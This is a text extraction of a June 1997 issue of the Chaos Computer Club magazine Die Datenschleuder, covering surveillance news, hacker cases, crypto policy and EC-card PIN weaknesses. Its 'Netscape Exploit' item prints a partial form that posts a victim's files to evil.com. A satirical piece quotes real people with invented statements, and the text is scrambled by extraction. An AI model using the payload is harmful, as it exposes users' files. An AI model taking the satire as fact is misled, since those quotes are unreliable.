Datenschleuder #59
-
Upload
linkezeitschriften -
Category
Documents
-
view
219 -
download
0
Transcript of Datenschleuder #59
-
8/9/2019 Datenschleuder #59
1/32
Die Datenschleuder
ISSN 0930-1045
Juni 1997, DM 5,00
Postvertriebsstck C11301F
Das wissenschaftliche Fachblatt fr Datenreisende
Ein Organ des Chaos Computer Club
#59
s Aktenzeichen ECungelst
s Neues von der Kryptofront
s Internetz endlich verboten
Ein Sicherheitsproblem bei ihrer EC-Karte
ist aufgetreten.
Geben Sie die Karte ihrer Bank zurck.
Gehen Sie nicht ber Los.
Ziehen sie keine Klage wegen Betrugs und
Vortuschung einer Straftat ein.
Neu!Jetz
tmito
hneCD-RO
M!
-
8/9/2019 Datenschleuder #59
2/32
Die Datenschleuder
Nummer 59, Juni 1997
Adressensiehe a uch http:/ / w w w .ccc.de & de.org.ccc
Herausgeber:
(Abos, Adressnderungen etc.)Chaos Computer Club e.V.Schwenckestrasse 85D-20255 HamburgTel. 040-401801-0 /Fax. 040-4917689Mail: [email protected]
Redaktion:(Artikel, Leserbriefe etc.)Redaktion DatenschleuderPostfach 642 860D-10048 BerlinTel. 030-28354872/Fax. 030-28354878(Tel ndert sich vorr. demnchst)Mail: [email protected]
Druck: St. Pauli Druckerei Hamburg
ViSdP: Andy Mller-Maguhn
Mitarbeiter dieser Ausgabe:
Andreas, Bishop ([email protected]),Andy ([email protected]), Wau Holland([email protected]), Tim Pritlove([email protected]), Christine Schnfeld,Silke, Tobias ([email protected]),Zapf DingbatsEigentumsvorbehalt:Diese Zeitschrift ist solangeEigentum des Absenders, bis siedem Gefangenen persnlichausgehndigt worden ist. Zur-Habe-
Nahme ist keine persnlicheAushndigung im Sinne desVorbehalts. Wird die Zeitschrift demGefangenen nicht ausgehndigt, soist sie dem Absender mit demGrund der Nichtaushndigung inForm eines rechtsmittelfhigenBescheides zurckzusenden.Copyright (C) bei den AutorenAbdruck fr nichtgewerbliche
Zwecke bei Quellenangabe erlaubt.
Hamburg: Treff jeden Dienstag, 20 Uhr in den Clubrumen in der
Schwenckestr. 85 oder im griechischen Restaurant gegenber. U-BahnOsterstrasse / Tel. (040) 401801-0, Fax (040) 4917689, Mail: [email protected]
Berlin: Treff jeden Dienstag ca. 20 Uhr in den Clubrumen, NeueSchnhauser Str. 20, Vorderhaus ganz oben. S-/U-Alexanderplatz, S-Hackescher Markt oder U-Weinmeisterstr. Tel. (030) 28354870, Fax (030)28354878, Mail: [email protected]. Briefpost: CCC Berlin, Postfach 642 860,D-10048 Berlin Chaosradio auf Fritz i.d.R. am letzten Mittwoch imMonat von 22.00-01.00 Uhr.
Sachsen/Leipzig: Treffen jeden Dienstag ab 19 Uhr im Caf Ambiente,Petersteinweg, Nhe Neues Rathaus/Hauptpolizeiwache. Veranstaltun-
gen werden p. Mail ber d. Sachsen-Verteiler (Uni-Leipz) angekndigt.Infos f. Neueinsteiger gibts von [email protected] /Briefpost:Virtueller CCC-Sachsen, c/o Frohburger Medienhaus, Leipziger Str. 3,04654 Frohburg, Tel: (034348)51153, Fax (034348)51024, Mail:[email protected], http://www.sachsen.ccc.de
Kln: Ab 1. Juli Treff jeden Dienstag um 19:30 bei Abgang! in derHndelstrasse 19. Telefonischer Kontakt via 0177-2605262.
Mnchengladbach: Treff: Surfers Paradise, Bahner 19 in Mnchenglad-bach vorerst einmal im Monat jeden letzten Freitag, Ab 1. August dannimmer Dienstags um 20 Uhr. Mail: [email protected]
Bielefeld: FoeBud e.V., Treff jeden Dienstag um 19:30 im Cafe Durst inder Heeperstr. 64. Monatliche Public Domain Veranstaltung, sieheMailbox. Briefpost: Foebud e.V., Marktstr. 18, D-33602 Bielefeld, Fax.(0521) 61172, Mailbox (0521) 68000 und Telefon-Hotline Mo-Fr 17-19Uhr (0521) 175254. Mail [email protected]
Lbeck: Treff am ersten und dritten Freitag im Monat um 19 Uhr imShortys, Kronsforder Allee 3a. mail: [email protected],http://www.on-lbeck.de/bscher/ccc.html, Briefpost: CCC-HL c/oBenno Fischer, Bugenhagenstr. 7, D-23568 Lbeck. Tel. (0451) 3882220,Fax. (0451) 3882221
Ulm: Treff jeden Montag um 19 Uhr im Cafe Einstein an der Uni Ulm.Kontakt: [email protected]
Stuttgart: Computerunde Scrates, Mail [email protected]
Frankfurt/Mainz: kriegen sich noch nicht zusammengerauft. Wird dasbald mal was?!
sterreich: Engagierte ComputerexpertInnen,Postfach 168, A-1015 Wien
USA: 2600 siehe http://www.2600.com
ImpressumDie Datenschleuder Nr. 59Quartal I, Juni 1997
-
8/9/2019 Datenschleuder #59
3/32
Index
3 - G10 Statistik inofziel verffentlicht
- Europ. IN-provider ham Schnauze voll4 - Biologische Kriegsfhrung: USA vs. Kuba
- Masterspy Turned out Schoolboy Hacker5 - Sex-Straftter am Internet-Pranger
- Hackers hit Polish prime minister- Japan:Hacker replaced weather with Porn
6 - Netscape Security Flaw is a feature- Netscape Exploit
7 - Netscape privacy problem reduced- NT Insecurity
8 - Absolution fr Ladendiebe
- Pay per view execution?
Liebe Datenschleuder Leser,
das Prinzip der Dezentralitt und Diskordinitt (und leider auch der Diskoordinitt ;-)begleitet diesen Computer Club jetzt schon seit mehr als ein Jahrzehnt. Die Dynamik desLebens, gekoppelt mit der Erfrischung der Wiedersprche und hnlichen Zutaten waren
bislang ein mehr oder weniger gutes Rezept das Chaos aufrechtzuerhalten.
Ob wir allerdings mit der wachsenden Relevanz unserer Themen (z.B. diese bldenComputer & ihre Auswirkungen auf das menschliche Leben) unsere Diskoordinitt auch bei-
behalten sollten, steht momentan mal wieder zur diskordischen Diskussion.Professionalisierung als Gebot der Stunde? Machtbernahme? Forschungszentrum fr kyber-netische Hebelermittlung? Stiftung fr hochbegabte aber sozial extraterristisch orientierte
Jugendliche? Lobbyarbeit? Partei grnden? Genossenschaft aller CCC nahen Firmen?Bundesregierung wegprogrammieren? Internet endlich als Land bei der UN anmelden unddahin ziehen?
Informationsfreiheit ist leicht gesagt und schwer verwirklicht. Unser Layouter z.B. hat sichvon der letzten Datenschleuder noch nicht erholt und vor Fertigstellung dieser erstmal dieFlucht ergriffen und sich in den Urlaub abgesetzt. Der fr Beschreibung derartigerSachverhalte zustndige Redakteur fr die Katastrophenberichterstattung wurde das letztemal beim packen seines Wohnmobils gesehen. Und das Resultat von alldem?
Haltet ihr in den Hnden.Trotzdem gibt es hoffnungsvolle Anstze, mit dem Chaos bald die Welt zu regieren. Kritiker
behaupten, wir wrden das lngst tun. Effektivere Manahmen ergreift in diesem Sinnejedoch eher die Bundesregierung: erlt Multimedia- Gesetze die eigentlich alles unklarewie z.B. Verantwortlichkeiten regeln sollen, in erster Linie aber deutlich dokumentieren, dadie Verantwortlichen das Internet gar nicht begriffen haben und in der Konsequenz einRiesen-Chaos anrichten. In diesem Sinne gibt es viel zu tun. Lasst uns bloss wegfahrn. NachHolland zum Beispiel (siehe Seite 31).rt,eure Stimme aus dem Chaos
Die Datenschleuder
Nummer 59, Juni 1997
Editorial
W ir Diskordier mssen auseinanderhalten.. .
9 - EC-Karten Unsicherheit11 - Gutachten von Prof. Pausch zum EC-PIN21 - Algorithmus zur Generierung der PIN22 - OVst-Watch: Beobachtungen am T-Netz
23 - Gesetze gegen Code-Knacker geplant- Bundestag zur Lage der IT-Sicherheit
24 - DES noch nicht tot, stinkt aber schon- USA: Kontrolleinschrnkungssimulation
26 - ...It doesnt change things at all- PGP darf exportiert werden- Alert: Senate to vote on...key escrow
27 - RSA/CRT: One strike and youre out!28 - SET auch durch29 - Das Allerletzte...30 - Termine / HOPE II / HIP97 / CCC-MV31 - Bestellfetzen
-
8/9/2019 Datenschleuder #59
4/32
France Telecom and British Telecom. EuNet
has already led one complaint last month,against Belgiums national carrier Belgacom.Outside the EU, the company has won a caseagainst Swiss PTT over unfair subsidies to itsown online service, Helsingius said.Belgacom has shown discriminatory practicetoward us on almost everything, includingdelaying on deliverables withoutexplanation, Helsingius said at a Europeanchief executives conference organized by the
Wall Street Journal here. Theres no decisionyet, because the commission is stillinvestigating the case.
The EC regulates competition in the 15countries of the European Union. But that[the complaint against Belgacom] is just apilot, Helsingius added. We have a box fullof other complaints against incumbent opera-tors in Germany, the United Kingdom andFrance. In Germany, Deutsche Telekom is so
strong in the market that they just dominate.EuNet International, which runs its ownInternet backbone but needs to interconnectwith local networks, is also unhappy with itstreatment from Dutch operator PTTNederland, Helsingius said, but he added:They are not the worst offenders ECcompetition ofcials declined to conrmwhether the commission will launch a fullinvestigation over the Belgacom case.
We are doing our duty, and Belgacom knowsus very well, said one senior competitionofcial, who could not be quoted by name.
Complaints against European nationaltelephone companies by ISPs and byindependent telecom carriers are expected toincrease during the next six months, as theEU prepares for the liberalization of telecommarkets in January 1998.
But though the European telecom services
Die Datenschleuder
Nummer 59, Juni 1997
Kurzmeldungen
Deutschland
1996 soviele Telefone abgehrt wieniemals zuvor
Das Bundeskriminalamt und die Bundesan-waltschaft haben im vergangenen Jahr sovieleTelefone abhren lassen wie nie zuvor.Demnach wurden insgesamt 4674 festinstallierte Anschlsse mit richterlicherGenehmigung angezapft.
Das seien 27,5 Prozent mehr als im Vorjahrgewesen. Auch die Zahl der berwachtenFunk-Telefone erreichte mit 1929 abgehrtenMobilanschlssen Rekordhhe. DieAbhraktionen kosteten insgesamt weit mehrals eine Million Mark.AFP/Bild 15.05.1997
Europa
Internet Provider Takes On TopEuropean Carriers
One of Europes leading independent Internetservice providers is to launch anti-trustactions against the European Unions topthree telecommunications carriers.
EuNet International, a Dutch-based ISP, saidTuesday it is set to launch a slate of
complaints to the European Commission overalleged dirty tricks including abuse ofdominant market position and unexplaineddelays to services promised to EuNet bytop EU telecom carriers attempting to protecttheir online service business against the inde-pendent ISPs.
EuNet International product developmentdirector Johan Helsingius said his companywill le complaints to the European
Commission against Deutsche Telekom,
-
8/9/2019 Datenschleuder #59
5/32
Internet
Masterspy Turned Out to beSchoolboy HackerLONDON - A masterspy believed by thePentagon to be the No. 1threat to U.S.
security and deadlierthan the KGB turnedout to be a Britishschoolboy hacker wor-king out of his
bedroom. U.S. military
chiefs feared that anEast European spyring had gained accessto their innermostintelligence secretsand hacked intoAmerican Air Defensesystems.
But a 13-month investigation and a dramaticpolice raid on his London home revealed that
16-year-old music student Richard Pryce wasthe culprit. Pryce, known on the internet asThe Datastream Cowboy, was ned $1,915Friday by a London court after what hislawyer calleda schoolboy prankreminiscentof the movie War Games. The U.S. Senatearmed services committee was told themystery hacker was the number one threat toU.S. security. He was said to have downloadeddozens of secret les, including details of theresearch and development of ballistic missiles.
Up to 200 security breaches were logged.Using a $1,200 computer and modem, Prycehacked into computers at Grifss Air Base inNew York and a network in California run bythe missile and aircraft manufacturerLockheed. Those places were a lot easier toget into than university computers inEngland, Pryce told reporters. It was moreof a challenge really, going somewhere I was-nt meant to. If you set out to go somewhere
and you get there, other hackers would be
market is supposed to be open to competition
by January next year, the EC has yet to workout how it will treat Net-based services such as Internet telephony which compete
directly with traditional carriers. The EC saidin May it was setting up a special unit to dealwith complaints of anti-competitive behavior inthe run-up to liberalizati-on of the telecommarket.
Peter Chapman, Techwire06.04.1997(Johan Helsingius aka Julfwar ber lange Jahrehinweg der Betreiber vonanon.penet.)
Planet Erde
Biologische Kriegsfhrung:Kuba beschuldigt USA
Laut CNN-Web vom 15.5.1997 sehen sichkubanische Farmer derzeit mit einemProblem konfrontiert, das sie bislang nur mitder Lupe erkennen knnen: ihre Ernte wirddurch einen winzigen Schdling namensThryps palmi bedroht. Smtliche Pestizidehaben sich als ineffektiv erwiesen. Das Insekthat bereits einen erheblichen Teil der kuba-nischen Gemseernte (Kohl, Tomaten,
Gurken, Bohnen) befallen, so da massivePreisanstiege zu erwarten sind, wenn dieInsektenplage anhlt.
Die kubanische Regierung wirft den USA bio-logische Kriegsfhrung vor. Ein US-Flugzeugsoll den Schdling im letzten Oktober berKuba ausgesetzt haben. Washingtondementiert.
Die Meldung war einen halben Tag auf dem CNN-Server und verschwand dann...
Die Datenschleuder
Nummer 59, Juni 1997
Chaos Realitts Abgleich
-
8/9/2019 Datenschleuder #59
6/32
altering its heading to read Hackpublic of
Poland and Government DisinformationCenter, a newspaper reported Wednesday.Internet users seeking information from theprime ministers ofce found themselvesreferred to the site of Playboy magazine bythe unknown hacker, who signed him orherself Damage.Inc, the daily GazetaWyborcza said. An ofcial in the ofce whichproduced the government website toldReuters Wednesday it had been withdrawnpending the provision of new security
codes.A copy of the altered version could stillbe viewed onhttp://www.software.com.pl/intdev/news/welcomep.html, the server of the Net SecurityInstitute (IBS) in Warsaw. The newspaperquoted government spokeswomanAleksandra Jakubowska as saying that thecabinet website was not connected to thegovernments internal computer network sothere was no danger of using the internet to
access government secrets.Reuter 07.05.1997
Internet
Japan police say hacker replacedweather with porn
TOKYO, (23.05.1997/Reuter) - Japanesepolice on Friday arrested a 27-year-old
computer engineer suspected of replacingpublic weather charts on the Internet withpornographic pictures. A spokesman forOsaka police said Koichi Kubojima, a residentof the northern Tokyo suburb of Fujimi, wasthe rst person in Japan to be arrested forsuspected violation of a 1987 anti-hacker law.
Kubojima is accused of taking over sevenweb pages of the Osaka-based televisionnetwork Asahi Broadcasting Company on
May 18 and replacing ve of the seven
Die Datenschleuder
Nummer 59, Juni 1997
Kurzmeldungen
impressed, he said. His prank put Pryce on
the front pages of most British newspapersSaturday with tales of The Schoolboymasterspy and The Boy who cracked openthe Pentagon.
Pryce, now 19, has been offered sizeable sumsfor the book and lm rights to his story buthis parents say he prefers to stick to hisdouble bass and concentrate on winning aplace in a leading London orchestra.
Quite remarkably in a society dominated by
sleaze, he has refused all the offers and wantsxto resume his quiet life, said his father,Nick Robertson. His computer skills were notreected in his exam results he was onlyawarded a D grade.
Reuter 22.03.1997
Internet
Sex-Straftter am Internet-PrangerSeattle - Sex-Straftter stehen im US-Bundes-
staat Alaska nach ihrer Haftentlassung amelektronischen Pranger. Wer wegenVergewaltigung, Kindesmibrauch oderVerbreitung von Pornographie verurteilt wur-de, wird mit Namen und Adresse auf einerneuen Webseite angegeben. Sie sei ein vollerErfolg, sagte die Polizei in Anchorage. In denersten 24 Stunden seit ihrer Einrichtung seisie fast 4000 mal angewhlt worden. Wie invielen anderen US-Bundesstaaten sollten die
Brger durch die Verffentlichung wissen,wer in ihrer Mitte wohne.
dpa 13.06.1997
Internet
Hackers hit Polish prime ministerswebsite
WARSAW - A hacker broke into the Polish
cabinets internet website over the weekend,
-
8/9/2019 Datenschleuder #59
7/32
According to Netscape spokesmen, this
feature was added to the kernel of Mosaic,then Navigator, in 1993, as part of the ClipperKey Recovery Program. As James Clarke putit an interview tonight on MSNBC, DorothyDenning asked us to insert the remote readcapabilities to ensure that the legitimateneeds of law enforcement are met. No personcruising the Web has any expectation ofprivacy, as even Declan McCullagh haspointed out. Marc Rotenberg commented,
Privacy at the individual user level isunimportant, just so long as a PrivacyOmbudsman can decide on the legitimateneeds of law enforcement.
Meanwhile, Microsoft has acknowledge thatall lines to its Redmond site are clogged bypeople dumping Navigator and trying todownload Explorer.
Tim May, [email protected]
Netscape ExploitHere is a sample it isnt complete but you getthe basic idea of what is going on
Evil-DOT-COMHomepage
NAME=daForm
ACTION=http://evil.com/cgi-bin/formmail.pl
METHOD=POST
-
8/9/2019 Datenschleuder #59
8/32
whenever a site tries to upload a form, giving
the user a chance to decide whether to allowit.
* Also, in Navigator 3.x and 2.x, go to theOptions menu and select NetworkPreferences. Turn OFF the Enable
JavaScript preference. This will blockexecution of JavaScript code which might tryto perform an invisible le upload, while per-mitting display of the rest of the page.These
measures are temporary until a full bug x ismade available by Netscape and provenagainst the EIFIST demo page.
Regards
NT InsecurityIn order to expose theaw and demonstratethese potential vulneabilities,NTsecurity.com
created a program toolcalled RedButton. Whenexecuted, RedButtonexploits the aw anddoes the following: - logson remotely to a Target
computer without presenting any User Nameand Password- gains access to the resourcespublished to Everyone - determines thecurrent name of Built-in Administratoraccount (thus demonstrating that it is uselessto rename it) - reads several registry entries(i.e. it displays the name of RegisteredOwner) - lists all shares (including the hiddenones) RedButton is not an intruders tool, andit does not increase any security risks orvulnerability. However, it demonstrates howa potential intruder can exploit an NT system.
http://www.ntsecurity.com/RedButton/index.htm
Die Datenschleuder
Nummer 59, Juni 1997
Kurzmeldungen
...Bugs...
Netscape privacy problem reproduced
Using information gleaned from the web siteof the Danish company that rst reported theproblem, Keith Woodard and DaveHumphrey at EIFIST have built a web pagewhich reproduces the privacy problem inNetscape Navigator and Communicator web
browsers. From that effort they have
developed a better understanding of how theNetscape bug works, and what defensivemeasures users can take until a bugx is avai-lable from Netscape. First, the problem isindeed read-only, and involves only les towhich the explicit path nameis known. Second, all lesystems accessible from theNetscape users system arereachable that meansmapped network drives as well
as the local hard disk. Third,JavaScript can be used by aweb site to automate reading ausers le so that it is invisibleto the user. However, the bugdoes not involve use of Java atall.
The demo website can be visited at thefollowing URL:
http://eist.frb.org/hacker/leupload.html
Please urge all Internet web users to take thefollowing interim steps until a permanent xis available from Netscape:
* In Navigator 3.x and 2.x, go to the Optionsmenu and select Security Preferences. Selectthe Submitting a Form Insecurely preferen-ce to enable that warning dialog box. This
will generate a warning box
-
8/9/2019 Datenschleuder #59
9/32
victims. To make an execution public like in the case
of Tim McVeigh, would be like returning to the 15thcentury. Arguably, in the case of Oklahoma City bom-bing, the victims were random Americans, and byextension each resident of the U.S. can be considered
their relative,proponents of thetelevised executionmay say. However,public was never inthe entire historyCHARGED to viewan execution. Howmany people wouldactually pay to watch
Timothy die? Imagine after a day of hard work, yourelax on your couch, pop up a beer can and order anice pay-per-view execution. Watch him die in privacyand convenience of your own apartment. How muchshould it cost? How much would people be willing topay? Should the victims and their relatives be paidroyalties - I mean, their suffering brought down the
sentence and the execution, but they did not activelyparticipate in the business. Will cable companies letthem watch execution for free, or at some discount atleast? Bizarre as it is - introduction of pay-per-viewexecutions may reduce the backlog on the death row:now, when there is money to be made, maybe therewill be state licensed lethal injection privatepractitioners (Kevorkian, as a person with immenseexperience, should apply), and the process of deliver-ing justice may speed up considerably.
http://www.peacenet.org/balkans/# Ursprung : /APC/GEN/RADIO## Ersteller: [email protected]
PO Box 46, NYC NY 10029, USA
Evolution
Absolution fr LadendiebeSupermrkte seien wie Krebsgeschwre frdas soziale Leben in den Stdten, meint deranglikanische Geistliche
John Papworth. Deshalbsei Ladendiebstahlkeine Snde. Die Kirchevon England reagierteebenso ungehalten wie
Supermarktketten undder britischeInnenminister. DochPapworth lt sich nicht
beirren: Jesus habe zwar Nchstenliebe gepre-digt, er habe aber nicht gesagt: Du sollstMarks und Spencer lieben, sagte derGeistliche in Anspielung eine britischeSupermarktkette.
Quelle: CriminalDigest 2/97
De-Evolution
Pay per view execution?In the U.S. Timothy McVeigh might get a pay-per-viewexecution prime time In middle ages executions werepopular spectacles: it was a way for powerful (nobles,kings, church, etc.) to show their power in mostagrant way to the peasants and just ordinary plebs. Itwas also a way for the public to participate in thepunishment of the perceived evil - whether it was a
real Jeffrey Dahmer like psycho, or a woman accusedfor witchcraft. Watching the criminal die for his/herscrimes or sins works cathartic on people. It alsoreinforces the public belief in justice, order and the sta-te. Only later in our development as humans did wedecide that an execution is actually a state sponsoredmurder, and no murder is justied under the rule ofGod, so, therefore, while many governments did notdispense off death penalty, they usually restrainedthemselves from televising executions and instead sho-
wing them just to the close range of relatives of
Die Datenschleuder
Nummer 59, Juni 1997
Chaos Realitts Abgleich
-
8/9/2019 Datenschleuder #59
10/32
Pausch-Gutachten seine (!) Serisitt
anzweifelten. Unter dem Motto: nicht maldie haben es geschafft, die Informationen zubekommen....
Diese Details und etliche andere kamenjedoch erst in den letzten Wochen zum Vor-schein, nachdem ein spektakulres Gerichts-urteil des OLG Hamm am 17.03.1997Bewegung in die Sache brachte. Unter demAktenzeichen 31 U 72 / 96 und der - leidererst Mitte Mai verfgbaren Urteilsbegrn-dung (2) - wurde nicht nur auf Oberlandes-gerichtsebene in einem nicht-revisionsfhigen
Urteil die Ermittelbarkeit aufgrund derKartendaten besttigt, sondern auch gleichdie Beweislastfrage auf die fallspezischenRandhandlungen bezogen. Ausschlaggebendwar wiederum ein Gutachten des Prof. Dr.Pausch, der allerdings diesmal wesentlichausfhrlicher die ihm bekannten Mglichkei-ten aufzeigte, wie ein Dieb den PIN-Codeermitteln knne.
Das nachstehend (mit freundlicher Genehmi-gung von Prof. Dr. Pausch) abgedruckteGutachten spricht fr sich und bringtdeutliche Beleuchtung in den Sachverhalt.Die Feststellung, da die Mglichkeit desErratens des PIN-Codes mit einerWahrscheinlichkeit von 1:150 aufgrund un-gleichmssiger Verteilung anderer Detailsmglich ist, wurde beim OLG-Hamm sogarvon Herrn Dr. Heuser vom Bundesamt frSicherheit in der Informationstechnik (BSI)
besttigt.
Herr Dr. Heuser versprach brigens einemMitarbeiter der Datenschleuder zwar die
umgehende Zusendung seines Gutachtens,dies erreichte uns jedoch auch nach 4 Wochennicht. Mittlerweile sind von mehreren unab-hngigen Quellen Hinweise auf die Motivedes BSI aufgetaucht, nach 15 (!) Jahren dielngst bekannte Unsicherheit des EC-Kartenverfahrens teilweise einzugestehen.Das BSI, so heit es, arbeitet an einer chip-kartenbasierten Lsung fr rechtsverbind-liche elektronische Unterschriften (Authen-tizierung) nach der jngst verabschiedetenSignaturgesetzgebung des Multimedia-
Gesetzes aus dem Hause Rttgers (BMBF).Wre ja auch komisch, wenn sich das
Die Datenschleuder
Nummer 59, Juni 1997
Bereits in der Datenschleuder Nummer 53 im
Dezember 1995 wurde der Leser in einemeinen lngeren Artikel ber die Verbraucher-schutz-Problematik der EC-Karte aufgeklrt.Im Kern besteht das Problem in der sog.Sorgfaltspicht des Kunden zum Umgangmit dem PIN-Code, welcher zu seiner EC-Karte gehrt.
Der Kunde ist verpichtet, diesen PIN-Codeniemandem mitzuteilen, ihn nicht zusammenmit der Karte aufzubewahren, ihn nicht aufdie EC-Karte selbst zu schreiben und so fort.Wird nun jemand seine EC-Karte z.B. mit sei-
nem kompletten Portemonaie geklaut und eskommt, bevor er die Karte ber den zentralenSperrdienst in Frankfurt sperrt, zu Abhebun-gen, hat er ein Problem. Konkret muss erseiner Bank beweisen, da er seiner Sorgfalts-picht nachgekommen ist, also seinemgeklauten Portemonaie kein Zettel mit seinemPIN-Code beilag. Die Banken argumentierten
bisher mit der Unmglichkeit, von den Datendes Magnetstreifens auf den PIN-Code zukommen. Sie verdchtigen standartmssig imGegensatz den Kunden, den Diebstahl derKarte nur vorgetuscht zu haben und dieAbhebungen selbst gettigt zu haben, bzw.als Mittter diese mitgeteilt zu haben.
Auch wenn der Algorithmus und dieVorgehensweise, wie aus den Kartendatender PIN berechnet wird schon lnger bekanntist, gelang der Beweis der Berechnung bishereher nicht und Gerichtsverfahren gingenentsprechend verbraucherungnstig aus.
Lediglich in einem Gerichtsverfahren von1988 (AZ 36C4386/87) in denen Prof. Dr.Pausch in einem Gutachten ermittelte, das
der PIN-Code sehr wohl unter bestimmtenVorraussetzungen ermittelbar war, bekam diebetroffene Kundin recht. In der Datenschleu-der 53 versprach ich damals mehr ber dasGutachten von Pausch und das Urteil inErfahrung zu bringen, was aufgrund akutenChaos auf anderen Baustellen (CCC95 undFolgen) unterblieb. Dies ist insofern im nach-hinein wichtig, als das der DS-Artikel in meh-reren Gerichtsverfahren als Beweismaterialeingereicht wurde und die Banken dann mitVerweis auf den versprochenen aber
fehlenden Folgeartikel mit den Details vom
EC-Karten Unsicherheit
-
8/9/2019 Datenschleuder #59
11/32
staatliche BSI sich uneigenntzig gegen die
Banken wenden wrde...Doch zurck zur Unsicherheit des EC-Systems. Die Wahrscheinlichkeitsaussage
beruht auf der Art und Weise der internenUmrechnung und einer Besonderheit. DieBesonderheit ist, dass die erste Ziffer der PINniemals eine 0 ist, tritt eine 0 im Rechen-proze als Ergebnis aus wird daraus eine 1gemacht. Die Art und Weise der Umrechnungist die Umwandlung der internen Hex-Werte(0-9 & A-F) auf Dezimalziffern (0-9): aus A-F wird wiederum 0-5 nach Modulo 10:
A=0, B=1 etc. - und aus A=0 wird bei derersten Ziffer wiederum aus 0 eine 1 weil die 0per Denition hier nicht erlaubt ist. So tretenan 1. Stelle die Ziffern 0,1,A,B vier mal sohug auf wie andere, die Ziffern 1-5insgesamt bei den anderen Stellen jedochdoppelt so hug auf wie die anderen. Damittreten bestimmte PINs huger auf als ande-re (Errechnungen dem Leser vorbehalten).
Reaktionen
Die Banken konzentrieren sich in ihrerReaktion derweil auf Nebelwerfen undMauern - nebst Umstellung auf ein neuesPIN-Verfahren. Das betroffene Institut desOLG-Hamm Urteils, die Postbank, verwei-gert z.B. eine eigene Stellungnahme (3) undverweist auf den Zentralen Kreditausschu(ZKA). Dieser wiederum versucht mitnebulsen Angaben die Urteilsbegrndungund den Gutachter zu diskreditieren.
So behauptet der ZKA (4) beispielsweise,[...] Viele Karten verfgen ber gar keine
gltigen Offset-Werte mehr, da diese Werte frdie berprfung der PIN heute nicht mehrbentigt werden. Der angenommeneWahrscheinlichkeitswert fr ein Erraten der PINist daher nicht zutreffend.. Implizit wird(aufgrund des Zwecks des Offsets; der Offsetistder (Zahlen-)wert, der dem Rechenergebnisdes Poolschlssels hinzugefgt wird, wennder Institutsschlssel nicht vorliegt) damit
behauptet, es gbe quasi keine ofine-betriebene GAA mehr, was allerdingssachlich falsch ist. So sind nicht nur ofine-
Zeiten von GAA aufgrund der Umbuchungvom technischen auf den juristischen
Die Datenschleuder
Nummer 59, Juni 1997
AZ 31 U 72 / 96 und folgen
Datenbestand bekannt, sondern auch
weiterhin (ofine) GAA im (europischen)Ausland; auch berichtete Pausch auf der alaCard Konferenz in Hamburg von einem Fallvon einer westdeutschen Grostadt im Mai1997, wo ein Bagger versehentlich dieKabelverbindungen eines GAA wegri unddieser trotzdem noch ec-Karten akzeptierteund bei richtigem PIN Geld ausspuckte.Bankenvertreter rumten auf selbigerKonferenz in der Diskussion brigens ein,man knne ja auch nicht im Ofine-Falleinfach die Auszahlung verweigern; manstelle sich den Kunden im Ausland vor, derauf einmal kein Bargeld bekommt oder imRestaurant sein Essen nicht bezahlen kann...
Eine richtige Sachinformation enthlt dieZKA-Stellungnahme dann brigens dochnoch: Darber hinaus werden alle Verfgungenund Verfhrungsversuche mit falscher PIN proto-kolliert, so da Angriffe, die auf einemAusprobieren von PIN beruhen, nachvollzogenund eindeutig erkannt werden knnen. (dieFrage ist nur wo, wann und durch wen!)sowie die Folgerung (wenn man sich dieEinschrnkung hinzudenkt, dass dies nur
beim online-Betrieb berhaupt sein kann),da Auch eine Vernderung desFehlbedienungszhlers auf der Karte fhrt dahernicht zu einer beliebig hohen Zahl von PIN-Versuchen..
Ganz zufllig, vllig unabhngig von diesenGeschehnissen und in berhaupt keinemZusammenhang stehend (;-) verkndet unsein Artikel in der FAZ vom 27.05.1997, dannda noch dieses Jahr alle ec-Karten eine neuePIN zugewiesen bekommen. Auf dem Weg
zur Abschaffung des 56-bit Poolschlsselsund ofine-GAA hin zu 128-Bit Instituts-schlsseln und der Mglichkeit, seinen PINselbst zu ndern gibt es zweiSchritte.
Zunchst erhalten die ec-Karten Kunden eineneue PIN mitgeteilt, die zum Tag X gilt. Dannim zweiten Schritt (ca. 1998) kann der Kundedie (neue) PIN selbst ndern (auf 4-12numerische Ziffern). Nach einer bergangs-zeit mit zwei gleichzeitig gltigen PINs (alsoder bisherigen (!) und der neuen, zunchstnicht aber spter vernderbaren) von drei bis
fnf Monaten stirbt dann die alte PIN und
-
8/9/2019 Datenschleuder #59
12/32
Die Datenschleuder
Nummer 59, Juni 1997
EC-Karten Unsicherheit
Spur 3 des Magnetstreifens wird gelscht
(Offsets etc.). Ofine-Autorisierung gibt esdann nur noch mit Chipkartenfunktion; dasheit in die elektronische Geldbrse wirdeine Authorisierungsfunktion fr die EC-Karte eingebaut. (Ist sie aber in den jetzt
bereits ausgegebenen Karten noch nicht.)
Die entscheidende technische Schwachstelledes EC-Kartensystems ist und bleibt der 56-
bit DES Pool-Schlssel. Das haben offenbarauch die Banken erkannt, erklrt dieVorgehensweise nach FAZ. Zustzlich solltemensch wissen, da der Pool-Schlssel, der
(siehe Schema) die Errechenbarkeit des PIN-Codes zu *jeder* EC-Karte (mit dem Offset)ermglicht, seit Einfhrung des EC-Kartensystems nicht gendert wurde.
Im Sinne der Evolution
Um die unheilsvolle Behauptung der Banken,der PIN sei aufgrund der Kartendaten nichterrechenbar ein fr alle mal in den Bereichder Unwahrheit zu rcken - und somit dieHaftungsfrage zu lsen und sich nicht mitden kosmetischen Spielerein zufriedenzuge-
ben, entstand im CCC die Idee, den 56-BitPoolschlssel doch einfach zu knacken. Unddas steht jetzt als Projekt an. Konkret habenwir uns dazu entschlossen, eine Schlssel-knackmaschine zu bauen (verteiltes Rechnendauert zu lange). Die Detailfragen, etwa obwir uns mit ASICs auf eine kostengnstige-re, aber auf 56bitDES beschrnkt Lsung ein-lassen oder mit FPGAs eine exiblere, aberaufwendigere und teurere Maschine konstru-ieren benden sich in der Diskussion (z.B.de.org.ccc). Auf der HIP97 Konferenz inHolland (siehe diese Datenschleuder) soll die
Konstruktionsdiskussion ffentlich gefhrtund die Entscheidungsndung baldmglichstabgeschlossen werden.
Abgesehen von den nicht ganz kleinentechnischen Problemen, die im Rahmen desProjektes zu lsen sind gibt es natrlich nochein nanzielles. Unter Bercksichtigung desZeitdrucks (Pool-Schlssel mu noch dieses
Jahr vorliegen, bzw [...selberdenken...]), derzu lsenden technischen Probleme (ASIC-Erstellung bzw. FPGA-Programmierung,Lieferzeiten, Stromversorgung (!), Bussystem)
ist das Projekt unter 1 Million DM mit den
zur Verfgung stehenden Ressourcen schwer-
